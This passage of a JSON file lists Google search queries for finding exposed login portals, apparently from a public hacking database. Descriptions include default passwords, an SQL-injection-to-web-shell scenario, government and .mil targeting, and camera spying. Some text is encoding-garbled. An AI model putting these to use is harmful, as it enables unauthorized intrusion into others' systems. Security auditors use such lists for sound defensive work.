administration facilities at organisation level * remote access user accounts * encrypted account bulk upload facilities * scalable services with 3 million accounts * replication facilities at several separate physical locations, offering a resilient authentication service"}, {"dork": "intitle:Login intext:\"RT is \u00a9 Copyright\"", "description": "RT is an enterprise-grade ticketing system which enables a group of people to intelligently and efficiently manage tasks, issues, and requests submitted by a community of users.Versions including 2.0.13 are vulnerable to injection, check outSecurityFocus BID 7509"}, {"dork": "intext:\"\"BiTBOARD v2.0\" BiTSHiFTERS Bulletin Board\"", "description": "The bitboard2 is a board that need no database to work. So it is useful for webmaster that have no access to a sql database. The password file can be retrieve from/admin/data_passwd.dat"}, {"dork": "\"pcANYWHERE EXPRESS Java Client\"", "description": "This search will reveal the java script program that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web."}, {"dork": "inurl:\"Activex/default.htm\" \"Demo\"", "description": "This search will reveal the active X plugin page that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web."}, {"dork": "intitle:\"VNC viewer for Java\"", "description": "VNC (Virtual Network Computing) allows a pc to be controlled remotely over the Internet. These are the password protected but still shouldn't be allowed to be indexed by Google by accident."}, {"dork": "intitle:\"PHPhotoalbum - Upload\" | inurl:\"PHPhotoalbum/upload\"", "description": "Homepage: http://www.stoverud.com/PHPhotoalbum/PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums."}, {"dork": "inurl:PHPhotoalbum/statistics intitle:\"PHPhotoalbum - Statistics\"", "description": "PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums."}, {"dork": "-Login inurl:photopost/uploadphoto.php", "description": "PhotoPost was designed to help you give your users exactly what they want. Your users will be thrilled to finally be able to upload and display their photos for your entire community to view and discuss, all with no more effort than it takes to post a text message to a forum.Over 3,500 web sites are powered by PhotoPost today. These customers trusted our software to simplify their lives as webmasters, and to meet the needs of their users."}, {"dork": "inurl:\"usysinfo?login=true\"", "description": "Dell OpenManage enables remote execution of tasks such as system configuration, imaging, application installation and support. It also used to track hardware and software inventory, to update configurations, drivers, OS and applications and to proactively monitor and correct fault conditionsDell OpenManage standards include the Common Information Model (CIM), Desktop Management Interface (DMI), Simple Network Management Protocol (SNMP), and Wired for Management (WfM).Another possible search for this is:\"Log in.\" inurl:1311/servlet/"}, {"dork": "intitle:\"ePowerSwitch Login\"", "description": "With ePowerSwitch D4 Guard, up to four devices can be individually switched on and off, also with programmed switching states. The activated Guard function ensures exceptionally high equipment availability: continually monitors whether the connected IP-based devices are still active, it can automatically, without user input, reboot any crashed device."}, {"dork": "inurl:orasso.wwsso_app_admin.ls_login", "description": "Oracle provides a Single Sign-On solution which is quite widely spread as it integrates quite seemlessly into exisitng appllications (as Oracle says).If the link itself shows an empty page, try the directory below."}, {"dork": "\"Microsoft CRM : Unsupported Browser Version\"", "description": "Microsoft CRM Login portal.MS says:Microsoft CRM integrates with Microsoft Office, Microsoft Business Solutions for Financial Management, and other business systems to give employees a complete view of customer information. The ease of integration with Microsoft Office is of particular value\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009denabling staff to access Microsoft CRM information from Microsoft Office Outlook and work online or offline with access to sales functionality."}, {"dork": "inurl:WCP_USER", "description": "WebConnect is client-server based software that provides secure browser based emulation to mainframe, midrange and UNIX systems"}, {"dork": "allinurl:wps/portal/ login", "description": "Login to IBM WebSphere Portal.You may find portals using standard administrator user/password which gave you complete access to the application itself."}, {"dork": "\"Powered by UebiMiau\" -site:sourceforge.net", "description": "UebiMiau is a simple, yet efficient cross-plataform POP3/IMAP mail reader written in PHP. It's have some many features, such as: Folders, View and Send Attachments, Preferences, Search, Quota Limit"}, {"dork": "intitle:\"VMware Management Interface:\" inurl:\"vmware/en/\"", "description": "VMware GSX Server is enterprise-class virtual infrastructure software for x86-based servers. It is ideal for server consolidation, disaster recovery and streamlining software development processes."}, {"dork": "inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0", "description": "eHealth, a network management solution, enables its users to manage performance and availability of LANs, WANs, routers, Switches, Frame Relay, ATM, Remote Access Equipment, QoS, Wireless LAN, DAL, Voice and Cable technologies."}, {"dork": "intitle:endymion.sak\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9.mail.login.page | inurl:sake.servlet", "description": "sak\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9 Mail, servlet-based web email system, designed for scaling to large numbers of concurrent users. Intended for large universities or enterprise-level mail system"}, {"dork": "intitle:ilohamail \"Powered by IlohaMail\"", "description": "IlohaMail is a light-weight yet feature rich multilingual webmail system designed for ease of use, written in pure PHP. It supports web-access to IMAP and POP3 accounts, and includes a complete contacts feature and other PIM features."}, {"dork": "intitle:\"Zope Help System\" inurl:HelpSys", "description": "By itself, this returns Zope's help pages. Manipulation of the URL, changing 'HelpSys' to 'manage', gives a link to a server's Zope Management Interface. While this requires authentication, sometimes overly revealing error messages are returned."}, {"dork": "intitle:\"SFXAdmin - sfx_global\" | intitle:\"SFXAdmin - sfx_local\" | intitle:\"SFXAdmin - sfx_test\"", "description": "Just another logon page search, this one is for SFX\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae, a link server from Ex Libris, delivers linking services in the scholarly information environment. SFX is also a component in the management of electronic resources in a library."}, {"dork": "\"Powered by DWMail\" password intitle:dwmail", "description": "What is DWmail\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2?: DWmail\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 is an 'intelligent' Web based email application written in the scripting language, PHP. DWmail\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 allows you and your visitors to access, manage and send email using any POP3 or IMAP4 compliant email account. Simply enter your email address and password to check your email."}, {"dork": "inurl:gnatsweb.pl", "description": "GNU GNATS is a set of tools for tracking bugs reported by users to a central site. It allows problem report management and communication with users via various means. GNATS stores all the information about problem reports in its databases and provides tools for querying, editing, and maintenance of the databases."}, {"dork": "intitle:open-xchange inurl:login.pl", "description": "Open-Xchange 5 is a high performance substitute for costly and inflexible Microsoft Exchange deployments -- with the full functionality of a mature collaboration platform. OX 5 will not only manage appointments and tasks, it will take care of email, calendar, contacts, to do's, projects, documents, search and forums. With OX, you can manage information using bookmarks that are linked to a wide variety of data objects, such as emails, spreadsheets and/or presentations. Open-XchangeT 5 allows you to connect to Microsoft Outlook and devices using the Palm OS. Based on proven open source technologies, OX 5 offers best-of-class security through anti-virus and anti-spam utilities."}, {"dork": "intitle:\"VisNetic WebMail\" inurl:\"/mail/\"", "description": "VisNetic WebMail is a built-in web mail server that allows VisNetic Mail Server account holders to access their email messages, folders and address books from any standard web browser on an Internet enabled computer."}, {"dork": "allintitle:\"Welcome to the Cyclades\"", "description": "This search reveals the login page for the Cyclades TS1000 and TS2000 Web Management Service. The Cyclades TS1000 and TS200 devices are Console servers, based on a cut down Linux version. These lovely devices sit on the network with console cables attached to them, so that you then gain access to this device, and then have console access to any of the hosts connected to the console ports. :-)The default username and password for these devices is, root/tslinux.This query currently only returns pages available in Google's cache (but in the future more devices may be returned)."}, {"dork": "intitle:\"XcAuctionLite\" | \"DRIVEN BY XCENT\" Lite inurl:admin", "description": "This query reveals login pages for the administration of XcAuction and XcClassified Lite..\"XcAuction is a powerful and complete auction package that allows you to add auction capabilities to any web site.\"\"XcClassified allows you to offer free or fee based classified ads to your site visitors. It integrates easily into your existing web site design and offers many features.\""}, {"dork": "intitle:\"XMail Web Administration Interface\" intext:Login intext:password", "description": "This search will find the Web Administration Interface for servers running XMail.\"XMail is an Internet and intranet mail server featuring an SMTP server, POP3 server, finger server, multiple domains, no need for users to have a real system account, SMTP relay checking\", etc..."}, {"dork": "intitle:\"Login to Cacti\"", "description": "Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality."}, {"dork": "\"You have requested access to a restricted area of our website. Please authenticate yourself to continue.\"", "description": "BackgroundEasySite is a Content Management System (CMS) build on PHP and MySQL. Many easysite servers still use the default username and password, however all of them have been contacted about this problem."}, {"dork": "intitle:\"TOPdesk ApplicationServer\"", "description": "Topdesk is some kind of incident ticket system with a webinterface. It requires: Windows 98 and Windows NT, Windows 2000, Windows XP, OS/2. It installs a webserver called: Jetty/4.2.2 and the default password (operator login) is admin/admin. The HTTP server header reveals the OS it's running on."}, {"dork": "intitle:\"Welcome to Mailtraq WebMail\"", "description": "Mailtraq WebMail is just another a web-based e-mail client. This is the login page."}, {"dork": "inurl:\"default/login.php\" intitle:\"kerio\"", "description": "This dork reveals login pages for Kerio Mail server. Kerio MailServer is a state-of-the-art groupware server allowing companies to collaborate via email, shared contacts, shared calendars and tasks. Download can be found here http://www.kerio.com/kms_download.html."}, {"dork": "intitle:phpnews.login", "description": "Vulnerable script auth.php (SQL injection)--- from rst.void.ru ---Possible scenario of attack:[1] log in admin panel, using SQL injection[2] upload PHP file through \"Upload Images\" function (index.php?action=images) and have fun with php shellor edit template (index.php?action=modtemp) and put backdoor code into it.-------------------------http://www.securityfocus.com/bid/14333/infohttp://rst.void.ru/papers/advisory31.txtThe version number may be found sometimes in error messages."}, {"dork": "intitle:communigate pro entrance", "description": "Just reveals the login for Communigate Pro webmail. A brute force attack could be attempted. The directory link from this page can in some instances be used to query user information."}, {"dork": "intitle:\"xams 0.0.0..15 - Login\"", "description": "This is the login for xams it should catch from 0.0.1-0.0.150.0.15 being the latest version as far as I can see their is only versions 0.0.13 0.0.14 and 0.0.15"}, {"dork": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "description": "iCMS - Content Management System...Create dynamic interactive websites in minutes without knowing HTML or web programming. iCMS is a perfect balance of ease of use, flexibility, and power. If you are a Web Developer, you can dramatically decrease your Website development time, decrease your costs and deliver a product that will yield higher profits with less maintenance required!Dont think there are any vulns attached to this"}, {"dork": "\"Powered by Monster Top List\" MTL numrange:200-", "description": "2 Step dork - Change url to add filename \"admin.php\" (just remove index.php&stuff=1&me=2 if you have to) for the admin login.This search finds more pages rather than focusing on the admin login page itself, thus the 2 step dork is more effective."}, {"dork": "\"login prompt\" inurl:GM.cgi", "description": "GreyMatter is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content."}, {"dork": "intitle:\"PHProjekt - login\" login password", "description": "PHProjekt is a group managing software for online calenders, chat, forums, etc. I looked around and i think the default admin login/pass is root/root. Results 1 - 23 of about 851 when i posted this"}, {"dork": "intitle:\"Login Forum Powered By AnyBoard\" intitle:\"If you are a new user:\" intext:\"Forum Powered By AnyBoard\" inurl:gochat -edu", "description": "Anyboard Login Portals. In addition,A vulnerability has been reported in Netbula Anyboard 9.x \"that may allow a remote attacker to gain access to sensitive data. This problem is due to an information disclosure issue that can be triggered by an attacker sending specific HTTP requests to a vulnerable host. This will result in sensitive information about the system being revealed to the attacker.\""}, {"dork": "intitle:\"Admin Login\" \"admin login\" \"blogware\"", "description": "Blogware Login Portal: \"An exciting and innovative tool for creating or enhancing your web presence. It is your key to easy publishing on the World Wide Web \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201c share pictures, video, links, documents, newsletters, opinions and more, with family, friends and colleagues. Now you can have a website without being a Webmaster. It\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2s simple! There is no HTML to learn and no new software to download and install.\""}, {"dork": "\"Please login with admin pass\" -\"leak\" -sourceforge", "description": "PHPsFTPd is a web based administration and configuration interface for the SLimFTPd ftp serverIt can be used an any http server that suports PHP and does not need a database or adittional php modules, only SlimFTPD It allows the administrators of the ftp server to configurate it from within this interface as opposed to its native ascii conf.file It shows statistics about the users that accesed the server , the files that were downloaded , server breakdowns etcAdmin password leak:http://cert.uni-stuttgart.de/archive/bugtraq/2005/07/msg00209.html"}, {"dork": "intitle:\"iDevAffiliate - admin\" -demo", "description": "Affiliate Tracking Software \tAdding affiliate tracking software to your site is one of the most effective ways to achieve more sales and more traffic! Our affiliate software installs in just minutes and integrates easily intoyour existing website."}, {"dork": "intitle:\"Supero Doctor III\" -inurl:supermicro", "description": "\"Supero Doctor III Remote Management\" by Supermicro, Inc.info: http://www.supermicro.es/products/accessories/software/SuperODoctorIII.htmljust look for default password..."}, {"dork": "inurl:ocw_login_username", "description": "WEBppliance is a software application designed to automate the deployment and management of Web-hosting services. There is a bug in how this product does the Logon validation. This Search will take you directly into the Admin pages....U can delete an User....(Plz dont do that..)Enjoy,Night Hacker"}, {"dork": "intitle:\"Docutek ERes - Admin Login\" -edu", "description": "Docutek Eres is software that helps libaries get an internet end to them. This dork finds the admin login in page. Using Docutek Eres you can look through course material amoung other things."}, {"dork": "intitle:\"OnLine Recruitment Program - Login\" -johnny.ihackstuff", "description": "This is the Employer's Interface of eRecruiter, a 100% Paper Less Recruitment Solution implemented by Universal Virtual Office. The only time you need to use paper is when you give out the appointment letter.The access to the Employer's Zone is restricted to authorized users only. Please authenticate your identity."}, {"dork": "\"iCONECT 4.1 :: Login\"", "description": "This search finds the login page for iCONECTnxt, it enables firms to search, organize, and review electronic and document discovery information \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009d including email, native files, and images \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009d from anywhere in the world for easy collaboration with outside counsel, branch offices, and consultants. LAN and Web solutions available."}, {"dork": "\"Powered by Merak Mail Server Software\" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff", "description": "Webmail login portals for Merak Email ServerMerak Email Server Suite consists of multiple awards winner Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWare"}, {"dork": "intitle:\"Merak Mail Server Web Administration\" -ihackstuff.com", "description": "User login pages for Merak Email Server Suite which consists of Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWaremore info: h**p://www.icewarp.com"}, {"dork": "\"This is a restricted Access Server\" \"Javascript Not Enabled!\"|\"Messenger Express\" -edu -ac", "description": "Mostly Login Pages for iPlanet Messenger Express, which is a web-based electronic mail program that enables end users to access their mailboxes using a browser. Messenger Express clients send mail to a specialized web server that is part of iPlanet Messaging Server. Thanks to the forum members for cleaning up the search."}, {"dork": "inurl:webvpn.html \"login\" \"Please enter your\"", "description": "The Cisco WebVPN Services Module is a high-speed, integrated Secure Sockets Layer (SSL) VPN services module for Cisco products."}, {"dork": "\"site info for\" \"Enter Admin Password\"", "description": "This will take you to the cash crusader admin login screen. It is my first google hack.. also try adding index.php at the end, have fun people :)"}, {"dork": "\"intitle:3300 Integrated Communications Platform\" inurl:main.htm", "description": "logon portal to the mitel 330 integrated communications platform.[Mitel\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 3300 Integrated Communications Platform (ICP) provides enterprises with a highly scalable, feature-rich communications system designed to support businesses from 30-60,000 users. ...supporting networking standards such as Q.SIG, DPNSS, and MSDN .... enable their legacy PBX's, ]"}, {"dork": "inurl:ids5web", "description": "EasyAccess Web is a application to view radiological images online.Like in hospitals or universities.Problem is the default administrative login: wadm/wadmBe able to watch sensitive data and images.very bad..."}, {"dork": "inurl:\"/admin/configuration. php?\" Mystore", "description": "simply google inurl trick for Oscommerce for open administrator page.If no .htpassword is set for the admin folder of osCommerce then of course you can change any setting in the shop unless password security has been enabled on the admin console.Despite a few demo pages there are a few open admin pages for webshops.Simple patch if you are one is to place a .htpassword file in the root of the admin folder. -- J.R.Middleton"}, {"dork": "Please enter a valid password! inurl:polladmin", "description": "The PHP Poll Wizard 2 ist a powerful and easy-to-use PHP-Script for creating and managing polls.more generic dork:\"Powered by PHP Poll Wizard\" | intitle:\"php poll wizard\""}, {"dork": "intitle:\"TWIG Login\"", "description": "\"TWIG is a Web-based groupware suite written in PHP, compatible with both PHP3 and PHP4. Its features include IMAP and POP3 email, Usenet newsgroups, contact management, scheduling, shared notes and bookmarks, a todo list, and meeting announcements.\""}, {"dork": "intitle:IMP inurl:imp/index.php3", "description": "Webmail Login pages for IMP\"IMP is a set of PHP scripts that implement an IMAP based webmail system. Assuming you have an account on a server that supports IMAP, you can use an installation of IMP to check your mail from anywhere that you have web access.\""}, {"dork": "intitle:\"SHOUTcast Administrator\" inurl:admin.cgi", "description": "Login pages for SHOUTcast\"SHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts. \""}, {"dork": "(intitle:\"WmSC e-Cart Administration\")|(intitle:\"WebMyStyle e-Cart Administration\")", "description": "Login Pages for WebMyStyle.\"WebMyStyle offers a full range of web hosting and dedicated server plans, but also gives you the ability to pick and choose the features that you need for your web sites.\""}, {"dork": "intitle:\"eXist Database Administration\" -demo", "description": "Login Pages \"eXist is an Open Source native XML database featuring efficient, index-based XQuery processing, automatic indexing, extensions for full-text search, XUpdate support and tight integration with existing XML development tools. The database implements the current XQuery 1.0 working draft as of November, 2003 (for the core syntax, some details already following later versions), with the exception of the XML schema related features.\""}, {"dork": "FlashChat v4.5.7", "description": "This simple search brings up lots of online Flash Chat clients. Flash Chat's administration directory is always found by visiting /admin in the URL. Example: www.webaddress.com/flashChat/admin/The default Admin password is \"adminpass\" (Without the speech marks)."}, {"dork": "intitle:Ampache intitle:\"love of music\" password | login | \"Remember Me.\" -welcome", "description": "Ampache is a Web-based MP3/Ogg/RM/Flac/WMA/M4A manager. It allows you to view, edit, and play your audio files via HTTP/IceCast/Mpd or Moosic. It has support for downsampling, playlists, artist, and album views, album art, random play, song play tracking, user themes, and remote catalogs using XML-RPC."}, {"dork": "\"SurgeMAIL\" inurl:/cgi/user.cgi ext:cgi", "description": "surgemail is an email server from netwinsite.com that can be accessed by a web browser. This dork finds the web logins."}, {"dork": "inurl:+:8443/login.php3", "description": "Plesk is a multi platform control panel solution for hosting.More information: hxxp://www.swsoft.com/plesk/Vulnerability: PLESK 7.5 Reload (and lower) & PLESK 7.6 for M$ Windows path passing and disclosure] Discovered By: GuanYu"}, {"dork": "inurl:\"/?pagename=AdministratorLogin\"", "description": "Powered by Bariatric AdvantageAdmin Login:Admin login pages for what looks like an inhouse eshop. No obvious public exploits but I'm sure there is a way WinkMore info found here:h**p://catalinalifesciences.com/ Credit to cp for the clean up"}, {"dork": "inurl:\"/?pagename=CustomerLogin\"", "description": "Customer login pages for what looks like an inhouse eshop. More information here:h**p://catalinalifesciences.com/ Credit to cp for clean up."}, {"dork": "intitle:\"AdventNet ManageEngine ServiceDesk Plus\" intext:\"Remember Me\"", "description": "serviceDesk Plus is a 100 % web-based Help Desk and Asset Management software.vendor: h**p://manageengine.adventnet.com/products/service-desk/index.htmlmanual: h**p://manageengine.adventnet.com/products/service-desk/help/adminguide/index.html"}, {"dork": "||Powered by [ClipBucket 2.0.91]", "description": "This search identifies clpbpucket installations. They frequently have an admin/admin default password on the administrative backend located at: http://server/admin_area/login.php .\nAuthor: Zhran Team"}, {"dork": "intitle:\"cascade server\" inurl:login.act", "description": "Search for login screen of default instance: Cascade Server CMS by Hannon Author: Erik Horton"}, {"dork": "intitle:\"Enabling Self-Service Procurement\"", "description": "Search for login screen of default instance: Puridiom (A Procurement Web\nApplication)"}, {"dork": "intitle:\"cyber recruiter\" \"User ID\"", "description": "Search for login screen of default instance: Cyber Recruiter (applicant\ntracking and recruiting software)"}, {"dork": "\"mailing list memberships reminder\"", "description": "Hi,\nBy default, while subscribing to a mailing list on a website, running\nMailman (GNU) for mailing list management, the user has got options to\nmanage his/her subscription options.\nThere is an option of getting password reminder email for this list\nonce in a month.\nAnd, by default, this option is set to Yes.\nAlong with sending the password reminder mail in *plain text* to the\nusers, it gets archived on the sites too.\nThanks,\nSagar Belure"}, {"dork": "inurl:\"cgi-bin/webcgi/main\"", "description": "inurl:\"cgi-bin/webcgi/main\"\nThis dork finds indexed public facing Dell Remote Access Card.\n-n17r0u6"}, {"dork": "inurl:/app_dev.php/login \"Environment\"", "description": "Search for login screen in web aplications developed with Symfony2 in a development environment\nDaniel Maldonado\nhttp://caceriadespammers.com.ar"}, {"dork": "intitle:\"Log In\" \"Access unsecured content without logging in\"", "description": "iOmega Storcenter login page:\nintitle:\"Log In\" \"Access unsecured content without logging in\"\nGreetings,\nAlrik"}, {"dork": "intitle:\"DVR+Web+Client\"", "description": "This dork will find most Linux-based DVR web clients that are accessible to\nthe web and through SSH. Linux-based DVR web clients are login portals for\nsurveillance web cameras wherein you can spy in other peoples cameras.\n*Default Usernames:* admin, guest, root\n*Default Passwords:* admin, guest, root\n*Author:* shipcode"}, {"dork": "inurl:\"InfoViewApp/logon.jsp\"", "description": "Google Hacking\n*SAP Business Object 3.1 XI*\ninurl:\"InfoViewApp/logon.jsp\"\ntwitter\n@firebitsbr"}, {"dork": "site:login.*.*", "description": "DORK:site:login.*.*\nDescription: Allow User To View\nLogin Panel Of Many WebSites..\nAuthor:MTK\nDATED: 13-1-1"}, {"dork": "intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx", "description": "Category : Pages containing login portals\nDescription : Dork for finding sensitive login portals\nDork : intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx\nLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&oq=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&gs_l=hp.3...852.852.0.983.1.1.0.0.0.0.121.121.0j1.1.0...0.0...1c.1.7.psy-ab.664iAsY450k&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.d2k&fp=7b93b16efbccc178&biw=1362&bih=667 \nDate : 20/3/2013\nExploit Author: Scott Sturrock\nEmail: f00bar'at'linuxmail'dot'org"}, {"dork": "intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx", "description": "Category : Pages containing login portals\nDescription : Dork for finding government login portals\nDork : intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx\nLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&oq=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&gs_l=hp.3...894.894.0.1059.1.1.0.0.0.0.116.116.0j1.1.0...0.0...1c.1.7.psy-ab.lvawmQ4rKqA&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.d2k&fp=7b93b16efbccc178&biw=1362&bih=667 \nDate : 20/3/2013\nAuthor : Scott Sturrock\nEmail: f00bar'at'linuxmail'dot'org"}, {"dork": "intext:Computer Misuse Act inurl:login.aspx", "description": "Category : Pages containing login portals\nDescription : Dork for finding sensitive login portals\nDork : intext:Computer Misuse Act inurl:login.aspx\nLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&oq=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&gs_l=hp.3...1565.1565.0.1684.1.1.0.0.0.0.105.105.0j1.1.0...0.0...1c.1.7.psy-ab.ZaZN16Ureds&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.ZWU&fp=7b93b16efbccc178&biw=1362&bih=667 \nDate : 20/3/2013\nAuthor : Scott Sturrock\nEmail: f00bar'at'linuxmail'dot'org"}, {"dork": "Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. All Rights.Reserved.", "description": "# Category: FTP Login Portals\n# Description : Dork for finding FTP Login portals\n# Google Dork: Serv-U \ufffd Copyright 1995-2013 Rhino Software, Inc. All\nRights.Reserved.\n# Date: 16/04/2013\n# Exploit Author: Arul Kumar.V\n# Vendor Homepage: www.serv-u.com\n# Email : hackerarul@gmail.com\nThank you"}, {"dork": "inurl:\"dasdec/dasdec.csp\"", "description": "inurl:\"dasdec/dasdec.csp\"\nDASDEC II Emergency Alert System\nUser Manual: http://www.digitalalertsystems.com/pdf/DASDEC_II_manual.pdf\nDefault username: Admin\nDefault password: dasdec"}, {"dork": "intitle:\"Cisco Integrated Management Controller Login\"", "description": "intitle:\"Cisco Integrated Management Controller Login\"\nThe Cisco Integrated Management Controller (CIMC) is the management service\nfor the C-Series servers. CIMC is built into the motherboard. This Google\ndork searches for the CIMC GUI login portal for remote access.\nax_"}, {"dork": "inurl:/secure/Dashboard.jspa intitle:\"System Dashboard\"", "description": "Finds login pages and system dashboards for Atlassian's JIRA.\n- Andy G - twitter.com/vxhex"}, {"dork": "intitle:\".:: Welcome to the Web-Based Configurator::.\" & intext:\"Welcome to your router Configuration Interface\"", "description": "#Summary: ZyXEL router login portal\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7\nNOTE:\ncurrently exists this -> https://www.exploit-db.com/ghdb/270/ but only shows\n8 results against 63100 that i sent, also covers more models."}, {"dork": "intext:\"I'm using a public or shared computer\" & intext:\"Remote Web Workplace\"", "description": "#Summary: Windows Business Server 2003 Login portal\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:\"/secure/login.aspx\"", "description": "#Summary: Several Web Pages Login Portal\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"Comrex ACCESS Rack\"", "description": "IP Codecs offering \"studio quality audio and video over wired and\nwireless IP circuits\". Used in studio-grade radio broadcasting over the\nweb. More product information here: http://www.comrex.com/products.html.\nThis Google search will return (some, but not hundreds of) web-facing\nlogin portals for this type of device. Requires JavaScript and Flash for\nviewer to work. Default login: comrex comrex.\n4N6 Security"}, {"dork": "allinurl:\"owa/auth/logon.aspx\" -google -github", "description": "[+] Description - Find OWA login portals\nRegards,\nnecrodamus\nhttp://www.twitter.com/necrodamus2600"}, {"dork": "\"inurl:/data/nanoadmin.php\"", "description": "Hi,\nI would like to submit this GHDB which allow to find out nanoCMS\nadministration pages :\n*inurl:\"/data/nanoadmin.php\"*\nBest regards,\nAntonino Napoli"}, {"dork": "inurl:/administrator/index.php?autologin=1", "description": "Title: google hacking username and password of joomla\nGoogle Dork: inurl:/administrator/index.php?autologin=1\nDate: 2013-11-30\nAuthor: Ashiyane Digital Security Team\nSoftware Link: www.joomla.org/\nVersion: joomla 2.5\nLocation: /administrator/index.php?autologin=1&passwd=[password]&username=[username]"}, {"dork": "allinurl:\"/main/auth/profile.php\" -github -google", "description": "[+] This dork will help you find Chamilo login portals. Depending on the\nversion, the site could be vulnerable to SQL injection.\nSee Here-\nhttps://www.exploit-db.com/exploits/30012/\nRegards,\nnecrodamus\nhttp://www.twitter.com/necrodamus2600"}, {"dork": "allinurl:\"zimbra/?zinitmode=http\" -google -github", "description": "zimbra webmail login page lookup\nallinurl:\"zimbra/?zinitmode=http\" -google -github\n-- \n-----------------------------------------------------------------\n*|JJohnny *RANDRIAMAMPIONONA |\n| Phone: (+261) 33 08 003 61 |\n| NSS Engineer | IS Security Enthusiast |\n| |----------------------------------------------------------------|"}, {"dork": "inurl:\"Citrix/XenApp/auth/login.aspx\"", "description": "Finds login portals for Citrix XenApp.\n- Andy G - twitter.com/vxhex"}, {"dork": "intitle:\"virtual office\" sonicwall domain", "description": "Network or vulnerability data\nIP address AD Domain NameLogin entry/method for internal network"}, {"dork": "intitle:FRITZ!Box inurl:login.lua", "description": "Show open FritzBox-Router with\nintitle:FRITZ!Box inurl:login.lua"}, {"dork": "inurl:logon.html \"CSCOE\"", "description": "Pages containing login portals - Web Server Detection \nFinds logins portals for Cisco ASA Clientless Webvpn\ninurl:logon.html \"CSCOE\""}, {"dork": "intext:\"Please Authenticate\" intitle:Peakflow", "description": "Pages containing login portals - Web Server Detection\nFinds Login portals for Arbor Peakflow (Anti-DDoS System)\nTwitter - @libborius"}, {"dork": "intitle:\"InterWorx-CP\" \"Forgot your password\"", "description": "InterWorx Web Hosting Control Panel login pages.\n- Andy G - twitter.com/vxhex"}, {"dork": "site:.mil + inurl:login.aspx | .asp | .html | .php | .htm", "description": "*Google Search : site:.mil + inurl:login.aspx | .asp | .html | .php | .htm\nZeel Chavda"}, {"dork": "intitle:Logon OrderCloud ui/logon.aspx", "description": "Four51 OrderCloud Company cloud software.\nOrderCloud for shopping websites 